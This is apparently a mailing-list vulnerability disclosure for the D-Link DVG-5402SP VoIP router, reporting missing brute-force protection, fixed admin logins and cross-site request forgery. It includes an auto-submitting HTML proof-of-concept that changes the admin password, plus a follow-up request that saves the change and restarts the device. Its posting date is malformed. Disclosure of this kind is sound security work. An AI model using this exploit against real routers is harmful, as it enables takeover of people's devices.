D-Link DVG-5402SP CSRF / Brute Force
Posted on 30 November -0001
<HTML><HEAD><TITLE>D-Link DVG-5402SP CSRF / Brute Force</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Hello list! There are Brute Force, Abuse of Functionality and Cross-Site Request Forgery vulnerabilities in D-Link DVG-5402SP VoIP Router. ------------------------- Affected products: ------------------------- Vulnerable is the next model: D-Link DVG-5402SP, Firmware RU_1.01. Other versions also must be vulnerable. Since December 2014 the developers didn't answer me concerning vulnerabilities in DVG-5402SP and other D-Link devices, which I informed them about. ---------- Details: ---------- Brute Force (WASC-11): http://site There is no protection from BF attacks in login form. Abuse of Functionality (WASC-42): Fixed logins: "admin" and "user". Which simplifies attacks. Cross-Site Request Forgery (WASC-09): Change admin's password: D-Link DVG-5402SP CSRF-1.html <html> <head> <title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/goform/AspPost" method="post"> <input type="hidden" name="K13" value="1"> <input type="hidden" name="ot_confirm_password_K13" value="1"> </form> </body> </html> Cross-Site Request Forgery (WASC-09): After the change, the password must be saved and the device restarted by separate GET request: http://site/ConfigBackupForm.asp I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7547/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua </BODY></HTML>